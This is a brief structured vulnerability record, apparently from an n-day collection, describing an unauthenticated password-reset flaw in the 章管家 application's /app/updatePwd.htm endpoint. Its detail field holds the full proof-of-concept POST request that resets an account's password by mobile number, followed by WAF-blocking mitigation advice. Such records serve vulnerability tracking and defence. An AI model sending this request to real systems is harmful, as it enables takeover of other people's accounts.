vendor = "章管家"
name = "章管家updatePwd.htm存在任意账号密码重置漏洞"
type = "未授权访问"
version = "未知"
path = "/app/updatePwd.htm"
detail = "POST /app/updatePwd.htm HTTP/1.1 Host: User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate, br Accept: */* Connection: close Content-Length: 87 Content-Type: application/x-www-form-urlencoded mobile=18888888888&newPassword=12312dsa12&equipmentName=xxxxxx&version=4.0.0&token=dingtalk_token"
fix = "WAF封禁路路径，等待发布补丁"
date = "0819"
label = "nday"
